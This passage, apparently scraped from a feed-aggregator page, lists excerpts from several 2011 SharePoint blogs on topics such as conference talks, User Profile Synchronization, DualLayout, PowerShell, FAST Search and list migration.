<h3 class="entry-title"><a href="http://feedproxy.google.com/~r/Harbar/~3/XsYLnm9eV2U/325.aspx" rel="bookmark" target="_blank">Upcoming Speaking Events</a></h3>

<div class="full-post">
<div class="author">Spence</div>
<div class="published">3 Mar 2011 | 11:27 am</div>
<div class="entry-content">
<div class="entry-bound">I have the privilege of speaking at the following SharePoint events over the next couple of months. Looking forward to meeting everyone, if you are attending, drop by and say hello! SharePoint Saturday Holland 26th March 2011, Utrecht, Netherlands I...ve done a couple of SharePoint Saturday events before, but only as a ...virtual... presenter, this will be the first time I...ll actually be at the event. I...ll be presenting my increasingly popular Rational Guide to User Profile Synchronization session. More details. European SharePoint Best Practices Conference 11th ... 13th April, London,&hellip;</div>
</div>
</div>

</li>
<li class="hentry">
<h3 class="entry-title"><a href="http://feedproxy.google.com/~r/Harbar/~3/qjXsLbna7SA/324.aspx" rel="bookmark" target="_blank">Decent SharePoint Books!!!!</a></h3>

<div class="full-post">
<div class="author">Spence</div>
<div class="published">25 Feb 2011 | 5:47 pm</div>
<div class="entry-content">
<div class="entry-bound">I...m frequently asked for SharePoint book recommendations. This is tricky because from my point of view most of them are rubbish. The publisher driven gold rush to get titles on the shelf on or around the release of a product really is very bad from a quality perspective. The amount of misinformation in SharePoint 2010 books in particular is outstanding. The good news is that things are beginning to get back on kilter and there have recently been some excellent books released. Here...s a very mini review of some quality titles recently published. Professional Business Connectivity Services&hellip;</div>
</div>
</div>

</li>
<li class="hentry">
<h3 class="entry-title"><a href="http://feedproxy.google.com/~r/Harbar/~3/R5NCMjfPLv8/323.aspx" rel="bookmark" target="_blank">Creating User Profile Synchronization Exclusion Filters using the userAccountControl attribute</a></h3>

<div class="full-post">
<div class="author">Spence</div>
<div class="published">22 Feb 2011 | 11:46 am</div>
<div class="entry-content">
<div class="entry-bound">Planning and implementing Exclusion Filters for SharePoint Server 2010 User Profile Synchronization (UPS) is without doubt one of the most important aspects of any UPS deployment. By making use of Exclusion Filters we can narrow down the objects we sync with. Exclusion Filters reduce the amount of ...junk... in the Profile database and can significantly decrease the time taken to perform synchronization runs. I will be posting more about Exclusion Filters in general soon, but for this post I will concentrate on the most commonly used filter ... that of the userAccountControl attribute in&hellip;</div>
</div>
</div>

</li>
<li class="hentry">
<h3 class="entry-title"><a href="http://feedproxy.google.com/~r/Harbar/~3/gkoM7VF5Q9U/article-sharepoint-server-2010-user-profile-synchronization-with-novell-edirectory.aspx" rel="bookmark" target="_blank">Article: SharePoint Server 2010 User Profile Synchronization with Novell eDirectory 8.8 SP6</a></h3>

<div class="full-post">
<div class="author">Spence</div>
<div class="published">21 Feb 2011 | 2:29 pm</div>
<div class="entry-content">
<div class="entry-bound">It...s been brought to my attention recently that you all love the User Profile Synchronization service instance in SharePoint Server 2010! :). So much so in fact, that one of the most common requests I get is for more articles on this topic, and in particular details on syncing with directory systems other than Active Directory. There is very little documentation about syncing with Novell eDirectory. Unfortunately at present TechNet only provides cursory information regarding permissions, and the early White Paper is extremely weak. Neither provide the necessary details to get it running.</div>
</div>
</div>

</li>
<li class="hentry">
<h3 class="entry-title"><a href="http://feedproxy.google.com/~r/Harbar/~3/2Yzq3zAcRCk/account-deletion-and-sharepoint-2010-user-profile-synchronization.aspx" rel="bookmark" target="_blank">Account Deletion and SharePoint 2010 User Profile Synchronization</a></h3>

<div class="full-post">
<div class="author">Spence</div>
<div class="published">10 Feb 2011 | 9:14 am</div>
<div class="entry-content">
<div class="entry-bound">Recently I...ve been asked a number of times about what happens to accounts deleted from Active Directory with respect to SharePoint 2010 User Profiles, and the User Profile Synchronization service instance. Unfortunately this pretty much isn...t documented at all, and furthermore there is quite a lot of incorrect information and assumptions about this area. There is plenty on how SharePoint 2007 handled things of course, but as regular readers (all two of them) will know, things are mighty different in 2010. The good news is that things are pretty straightforward and this post will walk&hellip;</div>
</div>
</div>

</li>
</ul><div class="row-clear">&nbsp;</div>
<ul id="feed11156" class="feed-block bf77286c0e290aa06a7f2a1e664d71e0">        <li class="site">
<div class="add-feed"><img src="/images/added-my.gif" alt="added to my.Alltop" class="added-feed-my" style="display:none" /><a href="#" class="add-feed-my" title="add this feed to my.Alltop"><img src="/images/add-my.gif" alt="add this feed to my.Alltop" /></a></div>
<h2><a href="http://www.chandima.net/Blog/Lists/Posts/MonthlyArchive.aspx" target="_blank" class="snap_shots">Chandima.Net Blog for SharePoint solutions: Posts</a></h2>
</li>
<li class="hentry">
<h3 class="entry-title"><a href="http://feedproxy.google.com/~r/chandima/~3/dVHeJVfG5Z8/ViewPost.aspx" rel="bookmark" target="_blank">New Zealand SharePoint Conference 2011...this year it...s even bigger!</a></h3>

<div class="full-post">
<div class="author">Chandima Kulathilake</div>
<div class="published">9 Feb 2011 | 11:15 pm</div>
<div class="entry-content">
<div class="entry-bound">Body: If you haven...t yet heard the New Zealand SharePoint community is hosting its third SharePoint Conference in Wellington on March 16th and 17th! If you are working on anything related to SharePoint then this is the place to be. As usual some of the worlds best SharePoint experts are speaking at the event and you also get to learn about what...s been happening locally. This conference is by the community for the community and with a ticket price of just $700 for two full days of content it more than delivers on a range of speciality areas and topics. Some of the highlights for this year&hellip;</div>
</div>
</div>

</li>
<li class="hentry">
<h3 class="entry-title"><a href="http://feedproxy.google.com/~r/chandima/~3/T09KVbtl598/ViewPost.aspx" rel="bookmark" target="_blank">Configuring RBS for SharePoint...Step by Step Guide</a></h3>

<div class="full-post">
<div class="author">Chandima Kulathilake</div>
<div class="published">3 Feb 2011 | 3:11 am</div>
<div class="entry-content">
<div class="entry-bound">Body: Via the team @knowledgecue and @ckukltd you can get hold of this step by step guide. This is a collaborative effort with Steve Smith of Combined Knowledge (UK). Steve runs a unique training class aimed for Infrastructure administrators who want to know about SharePoint in depth and this is one of the many module from that class. Remote Blob Storage (RBS) is a capability of SQL server 2008 and 2008R2 that can be used to offload content stored in databases to the file system. The guide covers the following three scenarios. Setup and configure FILESTREAM and RBS for a new content database.</div>
</div>
</div>

</li>
</ul><ul id="feed11157" class="feed-block 59a65ed597433ad020429a5663704686">        <li class="site">
<div class="add-feed"><img src="/images/added-my.gif" alt="added to my.Alltop" class="added-feed-my" style="display:none" /><a href="#" class="add-feed-my" title="add this feed to my.Alltop"><img src="/images/add-my.gif" alt="add this feed to my.Alltop" /></a></div>
<h2><a href="http://weblogs.asp.net/soever/default.aspx" target="_blank" class="snap_shots">Serge van den Oever [Macaw]</a></h2>
</li>
<li class="hentry">
<h3 class="entry-title"><a href="http://weblogs.asp.net/soever/archive/2011/03/08/duallayout-for-sharepoint-2010-wcm-quick-start.aspx" rel="bookmark" target="_blank">DualLayout for SharePoint 2010 WCM Quick Start</a></h3>

<div class="full-post">
<div class="author">svdoever</div>
<div class="published">8 Mar 2011 | 5:34 am</div>
<div class="entry-content">
<div class="entry-bound">DualLayout for SharePoint 2010 WCM is a solution to provide you with complete HTML freedom in your SharePoint Server 2010 publishing pages. In this post I provide a quick start guide to get you up and running quickly so you can try it out for yourself. This quick start creates a simple HTML5 site with a page to show-case the basics and the power of DualLayout. We will create the site in its own web application. Normally there are many things you have to do to create a clean start point for your SharePoint 2010 WCM site. All those steps will be provided in later posts. For now we want to give&hellip;</div>
</div>
</div>

</li>
<li class="hentry">
<h3 class="entry-title"><a href="http://weblogs.asp.net/soever/archive/2011/02/26/duallayout-opensourcefood-demo-site-installation-instructions.aspx" rel="bookmark" target="_blank">DualLayout OpenSourceFood demo site installation instructions</a></h3>

<div class="full-post">
<div class="author">svdoever</div>
<div class="published">25 Feb 2011 | 5:58 pm</div>
<div class="entry-content">
<div class="entry-bound">We released DualLayout which enables advanced web design with the power of SharePoint. DualLayout and a demo site which shows off the feature of DualLayout can be downloaded from the DualLayout product page. This blogpost contains detailed instructions on installing this demo site. The DualLayout demo site is based on the site http://opensourcefood.com. The demo site requires internet access because for some menu items it still links to pages and resources of the real site. Execute the following steps to install the OpenSourceFoodDemo demo site on your SharePoint Server 2010: Downloaded the&hellip;</div>
</div>
</div>

</li>
<li class="hentry">
<h3 class="entry-title"><a href="http://weblogs.asp.net/soever/archive/2011/02/26/macaw-duallayout-for-sharepoint-2010-wcm-released.aspx" rel="bookmark" target="_blank">Macaw DualLayout for SharePoint 2010 WCM released!</a></h3>

<div class="full-post">
<div class="author">svdoever</div>
<div class="published">25 Feb 2011 | 5:36 pm</div>
<div class="entry-content">
<div class="entry-bound">A few months ago I wrote a blog post about the DualLayout component we developed for SharePoint Server 2010 WCM. DualLayout enables advanced web design on SharePoint WCM sites. See the blog post DualLayout - Complete HTML freedom in SharePoint Publishing sites! for background information. DualLayout if now available for download. Check out DualLayout for SharePoint 2010 WCM and download your fully functional trial copy! Enjoy the freedom!</div>
</div>
</div>

</li>
<li class="hentry">
<h3 class="entry-title"><a href="http://weblogs.asp.net/soever/archive/2010/10/22/powershell-dot-source-scripts-into-your-module.aspx" rel="bookmark" target="_blank">PowerShell: dot source scripts into your module</a></h3>

<div class="full-post">
<div class="author">svdoever</div>
<div class="published">22 Oct 2010 | 4:03 am</div>
<div class="entry-content">
<div class="entry-bound">You can create wrapper modules around existing library script files you ...dot source... ...d into your PowerShell 1.0 code by dot sourcing them into your module. Problem is that from a module your current location is the location of the script that first imported your module. You can get the location of your module using the PowerShell variable $PSScriptRoot. So in your module file Xml.mps1 you can do something like: Write-Host &quot;Module Location: $PSScriptRoot&quot; . $PSScriptRoot\..\..\..\DotNet2\MastDeploy\MastPowerShellLib\MastDeploy-Logging.ps1 .</div>
</div>
</div>

</li>
<li class="hentry">
<h3 class="entry-title"><a href="http://weblogs.asp.net/soever/archive/2010/10/19/duallayout-complete-html-freedom-in-sharepoint-publishing-sites.aspx" rel="bookmark" target="_blank">DualLayout - Complete HTML freedom in SharePoint Publishing sites!</a></h3>

<div class="full-post">
<div class="author">svdoever</div>
<div class="published">19 Oct 2010 | 8:32 am</div>
<div class="entry-content">
<div class="entry-bound">Main complaint about SharePoint Publishing is HTML output size and quality. DualLayout to the rescue: complete HTML freedom in all your publishing pages! In this post I will introduce our approach, in later posts I will go into details on my personal vision on how you could build Internet facing sites on the SharePoint platform, and how DualLayout can help you with that. How SharePoint Publishing works But first a little introduction into SharePoint Publishing. SharePoint Publishing has the concept of templates that are used for authoring and displaying information. There are two types of&hellip;</div>
</div>
</div>

</li>
</ul><ul id="feed11159" class="feed-block 795381a2dfde833e81090be9c6ce2019">        <li class="site">
<div class="add-feed"><img src="/images/added-my.gif" alt="added to my.Alltop" class="added-feed-my" style="display:none" /><a href="#" class="add-feed-my" title="add this feed to my.Alltop"><img src="/images/add-my.gif" alt="add this feed to my.Alltop" /></a></div>
<h2><a href="http://www.21apps.com" target="_blank" class="snap_shots">Agile Sharepoint development by 21apps and Andrew Woodward MVP</a></h2>
</li>
<li class="hentry">
<h3 class="entry-title"><a href="http://feedproxy.google.com/~r/AndThePointIs/~3/ZL9NR_j0gmU/" rel="bookmark" target="_blank">Just because its a Policy, doesn...t make it right!</a></h3>

<div class="full-post">
<div class="author">Andrew Woodward</div>
<div class="published">3 Mar 2011 | 6:09 pm</div>
<div class="entry-content">
<div class="entry-bound">Back in 1995 I worked for a small company, Pierce Management Services, as a software developer programming in Dataflex. The company provided facilities management software to the NHS and MOD to support the maintenance and servicing of building and facilities managed on the estates. The requirement for any supplier was at the time to be fully ISO 9001 accredited to ensure that the software and services were performed consistently and to a reasonable standard.&#160; More specifically we worked to ISO9001 : TickIt,&#160; where TickIt was introduced to make the engineering based ISO9001 standards&hellip;</div>
</div>
</div>

</li>
<li class="hentry">
<h3 class="entry-title"><a href="http://feedproxy.google.com/~r/AndThePointIs/~3/OnTl4kfCDd8/" rel="bookmark" target="_blank">Identity Crisis ... 21apps Org Shift Model</a></h3>

<div class="full-post">
<div class="author">Ant</div>
<div class="published">28 Feb 2011 | 7:26 am</div>
<div class="entry-content">
<div class="entry-bound">Andrew gave a great overview of the 21apps Organisational Shift Model recently in his post..Rightshifting with 21apps Org Shift Model, but that was just a taster for an initial series of blog posts going into some depth around our model, how we implement it with real clients and the story&#8217;s behind its effectiveness for delivering true business value from SharePoint, Office 365 or any other platform. The focus of this post is to give some more clarity about the Identity stage of our model. In our original whitepaper we stated the following: Where are you with respect to 21apps SharePoint&hellip;</div>
</div>
</div>

</li>
<li class="hentry">
<h3 class="entry-title"><a href="http://feedproxy.google.com/~r/AndThePointIs/~3/Uup6lQCBzqw/" rel="bookmark" target="_blank">Office365 Live Demo at SUGUK</a></h3>

<div class="full-post">
<div class="author">Andrew Woodward</div>
<div class="published">24 Feb 2011 | 1:42 pm</div>
<div class="entry-content">
<div class="entry-bound">Sign up for Midlands SUGUK event on 9th March to see a demonstration and discussion of the Office365 beta from me. Sessions: Session 1 : Paul Grimley- Preparing for Sharepoint 2010 &amp; Real World Experiences. Abstract: This session will talk about sharing thoughts about how to prepare for SharePoint 2010 whether this be an upgrade or a greenfield implementation and things to consider to make the implementation as successful as possible. I will touch on planning the upgrade / implementation and how best to do it, who to involve, discuss challenges and how to overcome them Session 2: Andrew&hellip;</div>
</div>
</div>

</li>
<li class="hentry">
<h3 class="entry-title"><a href="http://feedproxy.google.com/~r/AndThePointIs/~3/NVr6CWGAuDY/" rel="bookmark" target="_blank">Rightshifting with 21apps Org Shift Model</a></h3>

<div class="full-post">
<div class="author">Andrew Woodward</div>
<div class="published">18 Feb 2011 | 12:15 am</div>
<div class="entry-content">
<div class="entry-bound">What&#8217;s all this Rightshifting we keep talking about at 21apps? Noun: the process of moving toward the more effective end of the 0-5 point Rightshifting Scale of Effectiveness. That is, the activity of improving one&#8217;s capability to achieve one&#8217;s chosen strategic goals and to deliver the outcome(s) desired by one&#8217;s customers by delivering exactly what is wanted, in the correct quantity, at the right place, when it is needed, for an acceptable price# http://tagdef.com/rightshifting Ant Clay, Chief Strategy Officer at 21apps, coined the phase &#8216;The Celery&hellip;</div>
</div>
</div>

</li>
<li class="hentry">
<h3 class="entry-title"><a href="http://feedproxy.google.com/~r/AndThePointIs/~3/p-PIOOSiH6I/" rel="bookmark" target="_blank">SharePoint Retreat London 5th March 2011</a></h3>

<div class="full-post">
<div class="author">Andrew Woodward</div>
<div class="published">17 Feb 2011 | 1:35 pm</div>
<div class="entry-content">
<div class="entry-bound">Space is limited, the event is free, you will learn to do Test Driven Development with SharePoint at the second SharePoint retreat. Don&#8217;t delay get signed up now.. http://spretreatlondon11.eventbrite.com/</div>
</div>
</div>

</li>
</ul><div class="row-clear">&nbsp;</div>
<ul id="feed11161" class="feed-block 04f40f478fae8519af1293507c1c8132">        <li class="site">
<div class="add-feed"><img src="/images/added-my.gif" alt="added to my.Alltop" class="added-feed-my" style="display:none" /><a href="#" class="add-feed-my" title="add this feed to my.Alltop"><img src="/images/add-my.gif" alt="add this feed to my.Alltop" /></a></div>
<h2><a href="http://www.ableblue.com/blog" target="_blank" class="snap_shots">Matthew McDermott's SharePoint Blog</a></h2>
</li>
<li class="hentry">
<h3 class="entry-title"><a href="http://feedproxy.google.com/~r/MatthewMcDermott/~3/R_dYQHAepaU/add-additional-sortable-properties-to-your-fast-search-center.aspx" rel="bookmark" target="_blank">Add Additional Sortable Properties to your FAST Search Center</a></h3>

<div class="full-post">
<div class="author">Matthew McDermott</div>
<div class="published">4 Mar 2011 | 9:48 pm</div>
<div class="entry-content">
<div class="entry-bound">I am spiffing up my search demo for my talks at the SharePoint Best Practices Conference in La Jolla and London (and Connections in Orlando) and wanted to add a few additional sort options to the FAST Search Center in my environment like Author and Size. When I set up the environment I was careful to follow the excellent installation and configuration guide on TechNet. Yet, when I tried to configure the Search Actions Links web part in the search center it only showed two properties. I reviewed my configuration and checked that there were properties with the SortableType set to&hellip;</div>
</div>
</div>

</li>
<li class="hentry">
<h3 class="entry-title"><a href="http://feedproxy.google.com/~r/MatthewMcDermott/~3/XcmcvEhyVes/debugging-design-time-data-in-visual-studio-and-expression-blend.aspx" rel="bookmark" target="_blank">Debugging Design Time Data in Visual Studio and Expression Blend</a></h3>

<div class="full-post">
<div class="author">Matthew McDermott</div>
<div class="published">10 Feb 2011 | 10:44 pm</div>
<div class="entry-content">
<div class="entry-bound">I am a total convert. I have seen the light. The road is not always easy, but nobody promised that. Here I go. I LOVE Expression Blend 4. (I am learning to love MVVM, we...re still in the ...getting to know each other... phase.) Sure, there is tons of help available, including some amazing assistance in the form of MVVM Light. Guys like Laurent Bugnion scare me just a little. They know SO much about the topic that mere mortals like me struggle to get ramped up. Anyway, on to my topic. Design Time Data Ideally, when working with Visual Studio and Blend, you can switch from one to the other and&hellip;</div>
</div>
</div>

</li>
<li class="hentry">
<h3 class="entry-title"><a href="http://feedproxy.google.com/~r/MatthewMcDermott/~3/EqxEts7gO4U/using-iis-url-rewrite-after-moving-to-sharepoint.aspx" rel="bookmark" target="_blank">Using IIS URL Rewrite after Moving to SharePoint</a></h3>

<div class="full-post">
<div class="author">Matthew McDermott</div>
<div class="published">6 Feb 2011 | 10:00 pm</div>
<div class="entry-content">
<div class="entry-bound">Many of my clients are concerned about the loss of &quot;link juice&quot; when moving their public facing site to SharePoint. The issue is easy to understand. Even if you keep the structure of your site exactly the same as your current site, SharePoint forces the inclusion of the &quot;pages&quot; library in the URL. This means that moving www.mycompany.com/default.aspx to SharePoint will become www.mycompany.com/pages/default.aspx. In general this is not a problem because accessing www.mycompany.com will redirect to the default welcome page. The problems my clients have are three specific&hellip;</div>
</div>
</div>

</li>
<li class="hentry">
<h3 class="entry-title"><a href="http://feedproxy.google.com/~r/MatthewMcDermott/~3/CZ9L7OelA30/slide-decks-from-st-edward...s-pec-technology-expo.aspx" rel="bookmark" target="_blank">Slide Decks from St. Edward...s PEC Technology Expo</a></h3>

<div class="full-post">
<div class="author">Matthew McDermott</div>
<div class="published">6 Jan 2011 | 9:43 pm</div>
<div class="entry-content">
<div class="entry-bound">I had a great time yesterday speaking for folks who attended the 2011 Technology Expo at St. Edward...s University Technology Expo. My topics were: First Look: What's new for Developers in MS SharePoint 2010 Business Productivity: What's new for Developers in Microsoft SharePoint 2010 What's new in Office 2010 for Developers &amp; Microsoft SharePoint 2010 Social Thanks again for the attendance and let me know if you have an questions about the content.</div>
</div>
</div>

</li>
<li class="hentry">
<h3 class="entry-title"><a href="http://feedproxy.google.com/~r/MatthewMcDermott/~3/EEouJ5fsrhU/january-12-meeting-of-the-central-texas-sharepoint-user-group.aspx" rel="bookmark" target="_blank">January 12 Meeting of the Central Texas SharePoint User Group</a></h3>

<div class="full-post">
<div class="author">Matthew McDermott</div>
<div class="published">6 Jan 2011 | 9:32 pm</div>
<div class="entry-content">
<div class="entry-bound">SharePoint 2010 Multi-Tenant: Why and How to Use it RSVP: http://bit.ly/h0xASH January 12th Meeting Description: As organizations grow in their sophistication, multi-tenant scenarios become a superior alternative to more traditional single-tenant implementations. Speaker Javier Barrera will discuss how you should use a multi-tenant environment and why it might be right for you and your organization. We will also discuss the following: When it makes sense to use a multi-tenant farm for both internal and external situations. How multi-tenancy effects SharePoint 2010 service applications when&hellip;</div>
</div>
</div>

</li>
</ul><ul id="feed11163" class="feed-block 93fa5e0b8746bb60c46ca659732b0db8">        <li class="site">
<div class="add-feed"><img src="/images/added-my.gif" alt="added to my.Alltop" class="added-feed-my" style="display:none" /><a href="#" class="add-feed-my" title="add this feed to my.Alltop"><img src="/images/add-my.gif" alt="add this feed to my.Alltop" /></a></div>
<h2><a href="http://blogs.officezealot.com/mauro/default.aspx" target="_blank" class="snap_shots">Mauro Cardarelli</a></h2>
</li>
<li class="hentry">
<h3 class="entry-title"><a href="http://blogs.officezealot.com/mauro/archive/2011/02/27/29922.aspx" rel="bookmark" target="_blank">SharePoint Datasheet Mode - ...The selected cells are read-only...</a></h3>

<div class="full-post">
<div class="author">Mauro</div>
<div class="published">27 Feb 2011 | 3:44 am</div>
<div class="entry-content">
<div class="entry-bound">If you have worked with datasheet mode in SharePoint you...ll appreciate how easy it is to copy and paste data from Excel into SharePoint lists.&nbsp; One message I often hear users complain about is ...the selected cells are read-only....&nbsp; It seems that all is going well when suddenly SharePoint stops accepting pasted values and throws this message.&nbsp; A common reason for this message is a problem with some of the previously pasted values.&nbsp; Although this is hard to see in the interface, if you look in the lower left corner of the datasheet grid you might see a ...pending&hellip;</div>
</div>
</div>

</li>
<li class="hentry">
<h3 class="entry-title"><a href="http://blogs.officezealot.com/mauro/archive/2011/02/25/29920.aspx" rel="bookmark" target="_blank">Create Team Site under Publishing Site in SharePoint 2010</a></h3>

<div class="full-post">
<div class="author">Mauro</div>
<div class="published">25 Feb 2011 | 4:50 am</div>
<div class="entry-content">
<div class="entry-bound">I...ve been asked this question twice this week so I thought I would document it... You...ve created a new site collection in SharePoint 2010 and chose the Publishing Site template. When you go to Site Actions -&gt; New Site you only see ...Publishing Site with Workflow... and ...Enterprise Wiki... as available options. What if you want to create a team site as a subsite? ..&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Go to Site Actions -&gt; Site Settings ..&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Select ...Page layouts and site templates... under Look and Feel&hellip;</div>
</div>
</div>

</li>
<li class="hentry">
<h3 class="entry-title"><a href="http://blogs.officezealot.com/mauro/archive/2011/02/22/29916.aspx" rel="bookmark" target="_blank">Doing a SharePoint Assessment</a></h3>

<div class="full-post">
<div class="author">Mauro</div>
<div class="published">22 Feb 2011 | 3:36 am</div>
<div class="entry-content">
<div class="entry-bound">I...ve had the opportunity to do several SharePoint assessments over the years and while each customer/scenario was different the assessments often centered around ...we don...t know what we don...t know... help!... That is, there was a sense that SharePoint might be a good solution fit but external assistance was requested for validation and insight. While I can attest to starting every assessment document (typically the deliverable in this type of project) with a blank piece of paper, I do always follow a (personal) methodology. It centers on answering (and justifying the answers to) 3 key&hellip;</div>
</div>
</div>

</li>
<li class="hentry">
<h3 class="entry-title"><a href="http://blogs.officezealot.com/mauro/archive/2011/02/14/29908.aspx" rel="bookmark" target="_blank">Copying a SharePoint 2010 List to another Site</a></h3>

<div class="full-post">
<div class="author">Mauro</div>
<div class="published">14 Feb 2011 | 3:47 am</div>
<div class="entry-content">
<div class="entry-bound">With SharePoint 2007, I used the stsadm import/export functionality many times to move an entire site (all content plus security) to another location within its site collection or to another environment.&nbsp; With SharePoint 2010 (including Foundation), this has been extended down to the list level.&nbsp; This allows you to take any list and copy it to another location (very helpful in migrations and/or site redesigns). To export a list you can use PowerShell or SharePoint Central Administration.&nbsp; The Central Administration instructions are:&hellip;</div>
</div>
</div>

</li>
<li class="hentry">
<h3 class="entry-title"><a href="http://blogs.officezealot.com/mauro/archive/2011/02/12/29907.aspx" rel="bookmark" target="_blank">Feature ...X... for list template '101' is not installed in this farm</a></h3>

<div class="full-post">
<div class="author">Mauro</div>
<div class="published">12 Feb 2011 | 10:42 am</div>
<div class="entry-content">
<div class="entry-bound">This is one of those ...Here...s what I did to solve a problem; I...m not necessarily suggesting you try the same... posts... We were in the middle of what turned out to be a very complicated and difficult SPS2003 to (hosted) SharePoint Foundation migration.&nbsp; One of our biggest content sources was a document library with thousands of documents.&nbsp; The upgrade (double hop, content database attach) appeared to go cleanly in our development environment but when we attempted to import the document library into production&nbsp;(using the new list export functionality in SharePoint 2010) we&hellip;</div>
</div>
</div>

</li>
</ul><ul id="feed11165" class="feed-block 4933f6ef0a2c3637d1874588ac405830">        <li class="site">
<div class="add-feed"><img src="/images/added-my.gif" alt="added to my.Alltop" class="added-feed-my" style="display:none" /><a href="#" class="add-feed-my" title="add this feed to my.Alltop"><img src="/images/add-my.gif" alt="add this feed to my.Alltop" /></a></div>
<h2><a href="http://sp.meetdux.com" target="_blank" class="snap_shots">meetdux.com</a></h2>
</li>
<li class="hentry">
<h3 class="entry-title"><a href="http://feedproxy.google.com/~r/Meetdux/~3/EygUFOsAQh0/5-Effective-Ways-To-Deliver-Dynamic-Presentations.aspx" rel="bookmark" target="_blank">Screencast: '5 Effective Ways To Deliver Dynamic Presentations' @JoinMe Webcast</a></h3>

<div class="full-post">
<div class="author">Dux Raymond Sy, PMP</div>
<div class="published">21 Feb 2011 | 6:55 am</div>
<div class="entry-content">
<div class="entry-bound">In the last 16 years, I've had the great privilege of developing and delivering presentations for various audience. As you may know, it takes a lot of preparation and practice to be the public speaker you want to be. Being able to deliver a clear, concise and engaging.. presentation is what every pre... (More)</div>
</div>
</div>

</li>
<li class="hentry">
<h3 class="entry-title"><a href="http://feedproxy.google.com/~r/Meetdux/~3/_2WLfwirL9I/SPTechCon-SFO-2011.aspx" rel="bookmark" target="_blank">#SharePoint Resources from #SPTechCon SFO 2011</a></h3>

<div class="full-post">
<div class="author">Dux Raymond Sy, PMP</div>
<div class="published">11 Feb 2011 | 3:43 am</div>
<div class="entry-content">
<div class="entry-bound">I had a great time at SharePoint Technology Conference ..in San Francisco this week! I enjoyed seeing old friends and meeting new ones. Thanks to those who came and attended my sessions. Here's a short video recap for you: .. .. Video: SPTechCon SFO 2011 .. .. In addition, I had the great opportu... (More)</div>
</div>
</div>

</li>
<li class="hentry">
<h3 class="entry-title"><a href="http://feedproxy.google.com/~r/Meetdux/~3/xrt96qf_GS4/Jared-Spataro-on-SharePoint-Journey.aspx" rel="bookmark" target="_blank">Video: Jared Spataro Explains What SharePoint Journey is All About</a></h3>

<div class="full-post">
<div class="author">Dux Raymond Sy, PMP</div>
<div class="published">8 Feb 2011 | 9:28 am</div>
<div class="entry-content">
<div class="entry-bound">I had the great opportunity to sit down and talk to Jared Spataro, SharePoint Director of Product Management, here at SharePoint Technology Conference in San Francisco..right after his keynote..on 'Your SharePoint Journey: Maximizing Your Investment'..... .. In this 9 minute video, Jared talks about ... (More)</div>
</div>
</div>

</li>
<li class="hentry">
<h3 class="entry-title"><a href="http://feedproxy.google.com/~r/Meetdux/~3/uIOdFTE9TaI/webcast-Prepare-Deliver-SharePoint-Success-2011.aspx" rel="bookmark" target="_blank">Video: Prepare & Deliver SharePoint Success #in 2011 w/ @curryben + @meetdux</a></h3>

<div class="full-post">
<div class="author">Dux Raymond Sy, PMP</div>
<div class="published">1 Feb 2011 | 1:57 am</div>
<div class="entry-content">
<div class="entry-bound">Thanks to all those who participated in..a webcast last week, &quot;Effectively Prepare and Deliver SharePoint Success in 2011&quot; where Ben Curry and I discussed how to: .. - Justify.. your SharePoint investment - Assess your organizational readiness for adopting SharePoint 2010 - Understand... (More)</div>
</div>
</div>

</li>
<li class="hentry">
<h3 class="entry-title"><a href="http://feedproxy.google.com/~r/Meetdux/~3/w-MCcMLrfGM/Governance-Without-Enforcement-Is-A-Suggestion.aspx" rel="bookmark" target="_blank">SPBizChat Ep 1: Governance Without Enforcement is a Suggestion</a></h3>

<div class="full-post">
<div class="author">Dux Raymond Sy, PMP</div>
<div class="published">28 Jan 2011 | 12:53 am</div>
<div class="entry-content">
<div class="entry-bound">Happy Friday! Hope y'all had a great week. To cap it off,..I'd like to invite you to watch the..inaugural episode of SharePoint Biz Chat..(SPBizChat). This is..a regular..show..focused on how to reap the business benefits of SharePoint featuring Andrew Woodward, Paul Culmsee, Michael Sampson, Ruven Gotz... (More)</div>
</div>
</div>

</li>
</ul><div class="row-clear">&nbsp;</div>
<ul id="feed11168" class="feed-block 48dd9af546c75e73705e5b370385ed70">        <li class="site">
<div class="add-feed"><img src="/images/added-my.gif" alt="added to my.Alltop" class="added-feed-my" style="display:none" /><a href="#" class="add-feed-my" title="add this feed to my.Alltop"><img src="/images/add-my.gif" alt="add this feed to my.Alltop" /></a></div>
<h2><a href="http://www.lcbridge.nl/" target="_blank" class="snap_shots">Margriet and Nikander on SharePoint</a></h2>
</li>
<li class="hentry">
<h3 class="entry-title"><a href="http://www.lcbridge.nl/vision/2010/powerpivot.htm" rel="bookmark" target="_blank">PowerPivot: brief discussion</a></h3>

<div class="full-post">
<div class="published">31 Dec 1969 | 4:00 pm</div>
<div class="entry-content">
<div class="entry-bound">PowerPivot: brief discussion Written by: Margriet Bruggeman, Nikander Bruggeman. May 2, 2010 PowerPivot: brief discussion Excel is a very powerful tool that can be used by end users for analyzing corporate data. Excel also allows you to import data from various data sources, such as a database. The contents of such data sources may be huge. PowerPivot integrates with both Excel and SharePoint and tries to make Excel more scalable, faster and flexible. PowerPivot for Excel literally allows you to import, filter, and sort millions of rows of data, allows you to build relationships between data&hellip;</div>
</div>
</div>

</li>
<li class="hentry">
<h3 class="entry-title"><a href="http://www.lcbridge.nl/vision/2010/workspace.htm" rel="bookmark" target="_blank">SharePoint Workspace</a></h3>

<div class="full-post">
<div class="published">31 Dec 1969 | 4:00 pm</div>
<div class="entry-content">
<div class="entry-bound">SharePoint Workspace Written by: Margriet Bruggeman, Nikander Bruggeman. May 2, 2010 SharePoint Workspace The ultimate ECM solution should allow information workers to work so flexible that they can do so anywhere they want, and anyhow they want to work. The ability to work offline is an essential part if you are really serious about executing such a vision. To this end, a couple of years ago Microsoft decided to acquire a product called Groove. In SharePoint 2010, it's called SharePoint Workspace and it fits in with SharePoint Server 2010 in a very natural way. Because of the importance of&hellip;</div>
</div>
</div>

</li>
<li class="hentry">
<h3 class="entry-title"><a href="http://www.lcbridge.nl/vision/2010/powershell.htm" rel="bookmark" target="_blank">PowerShell: Interact with SharePoint in the fastest way possible</a></h3>

<div class="full-post">
<div class="published">31 Dec 1969 | 4:00 pm</div>
<div class="entry-content">
